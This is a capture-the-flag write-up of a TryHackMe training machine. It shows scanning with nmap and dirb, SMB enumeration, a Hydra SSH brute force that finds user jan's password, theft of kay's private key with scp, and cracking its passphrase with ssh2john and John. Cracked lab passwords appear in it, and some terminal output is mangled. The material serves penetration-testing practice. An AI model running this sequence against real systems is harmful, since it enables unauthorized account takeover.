[TryHackMe] Brute-force attacks and escalating privileges using ssh2john.py in Hydra! Basic Pentesting Writeup

nmap -sV -A [target ip]

nmap -sV -A 10.10.98.167 130 ⨯ Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-17 23:40 JST Nmap scan report for 10.10.98.167 Host is up (0.25s latency). Not shown: 994 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA) | 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA) |_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http Apache Tomcat 9.0.7 |_http-favicon: Apache Tomcat |_http-title: Apache Tomcat/9.0.7 Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: basic2 | NetBIOS computer name: BASIC2\x00 | Domain name: \x00 | FQDN: basic2 |_ System time: 2023-03-17T10:40:57-04:00 |_clock-skew: mean: 1h19m59s, departure: 2h18m34s, median: 0s | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required |_nbstat: NetBIOS name: BASIC2, NetBIOS user:<unknown> , NetBIOS MAC:<unknown> (unknown) | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2023-03-17T14:40:57 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 59.84 seconds

dirb http://10.10.98.167 --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---- --> Testing: http://10.10.98.167/analytics ==> DIRECTORY: http://10.10.98.167/development/ + http://10.10.98.167/index.html (CODE:200|SIZE:158) (!) FATAL: Too many errors connecting to host (Possible cause: OPERATION TIMEOUT) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K 2018-04-22: SMB has been configured. -K 2018-04-21: I got Apache set up. Will put in our content later. -J ===== 2018-04-23: I'm messing around with the one from struts, and it looks pretty good! You can also host this server if it's better. I haven't made any real web applications yet, but I tried that example. You can show off how it works (and it's the REST version of the example!). Oh, and now I'm using version 2.5.12 because I had problems with other versions. -K 2018-04-22: SMB has been set. -K 2018-04-21: Apache has been set up. We will include our content later. -J

For J: I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP. -K ===== For J: I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You may know our password policy, so please follow the below: Is that so? Please change that password as soon as possible. -K

smbclient -L 10.10.98.167 Enter WORKGROUP\hacklab's password: Sharename Type Comment ----- ---- Anonymous Disk IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu) Reconnecting with SMB1 for workgroup listing. Server Comment ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

smbclient \\\\\10.10.98.167\\Anonymous Password for [WORKGROUP\root]: Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Apr 19 17:31:20 2018 .. D 0 Thu Apr 19 17:13:06 2018 staff.txt N 173 Thu Apr 19 17:29:55 2018 14318640 blocks of size 1024. 11094536 blocks available

smb: \> more staff.txt Announcement to staff: PLEASE do not upload non-work-related items to this share. I know it's all in fun, but this is how mistakes happen. (This means you too, Jan!) -Kay

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.98.167 Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-17 15:55:11 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://10.10.98.167:22/ [STATUS] 156.00 tries/min, 156 tries in 00:01h, 14344245 to do in 1532:31h, 14 active [STATUS] 122.00 tries/min, 366 tries in 00:03h, 14344035 to do in 1959:35h, 14 active [STATUS] 102.29 tries/min, 716 tries in 00:07h, 14343685 to do in 2337:12h, 14 active [22][ssh] host: 10.10.98.167 login: jan password: armando 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-17 16:03:18

ssh jan@10.10.98.167 The authenticity of host '10.10.98.167 (10.10.98.167)' can't be established. ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.98.167' (ED25519) to the list of known hosts. jan@10.10.98.167's password: Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102 jan@basic2:~$ 

cd ../ jan@basic2:/home$ ls -la total 16 drwxr-xr-x 4 root root 4096 Apr 19 2018 . drwxr-xr-x 24 root root 4096 Apr 23 2018 .. drwxr-xr-x 2 root root 4096 Apr 23 2018 jan drwxr-xr-x 5 kay kay 4096 Apr 23 2018 kay

jan@basic2:/home$ cd kay jan@basic2:/home/kay$ ls -la total 48 drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .drwxr-xr-x 4 root root 4096 Apr 19 2018 .. -rw---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 2 kay kay 4096 Apr 17 2018 .cache -rw------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 2018 .sudo_as_admin_successful -rw------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

scp -r jan@10.10.98.167:/home/kay/.ssh ./ jan@10.10.98.167's password: authorized_keys 100% 771 495.4KB/s 00:00 id_rsa 100% 3326 2.1MB/s 00:00 id_rsa.pub 100% 771 536.2KB/s 00:00    

┌──(root㉿kali)-[~] └─# cd .ssh ┌──(root㉿kali)-[~/.ssh] └─# ll total 20 -rw---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 1 root root 142 Mar 17 16:06 known_hosts.old

┌──(root㉿kali)-[~/.ssh] └─# python3 /usr/share/john/ssh2john.py id_rsa > hash.txt ┌──(root㉿kali)-[~/.ssh] └─# ll total 28 -rw------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ root 771 Mar 17 16:15 id_rsa.pub -rw-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

┌──(root㉿kali)-[~/.ssh] └─# /sbin/john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status beeswax (id_rsa) 1g 0:00:00:00 DONE (2023-03-17 16:19) 14.28g/s 1181Kp/s 1181Kc/s 1181KC/s behlat..bball40 Use the "--show" option to display all of the cracked passwords reliably Session completed. 

┌──(root㉿kali)-[~/.ssh] └─#ll total 28 -rw------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ -rw-r--r-- 1 root root 142 Mar 17 16:06 known_hosts.old ┌──(root㉿kali)-[~/.ssh] └─#chmod 400 id_rsa ┌──(root㉿kali)-[~/.ssh] └─# ll total 28 -rw------- 1 root root 771 Mar 17 16:15 authorized_keys -rw-r---- 1 root root 4762 Mar 17 16:18 hash.txt -r-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- id_rsa -rw-r--r-- 1 root root 771 Mar 17 16:15 id_rsa.pub -rw----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 4.4.0-119-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102 kay@basic2:~$ 

kay@basic2:~$ ls pass.bak kay@basic2:~$ cat pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$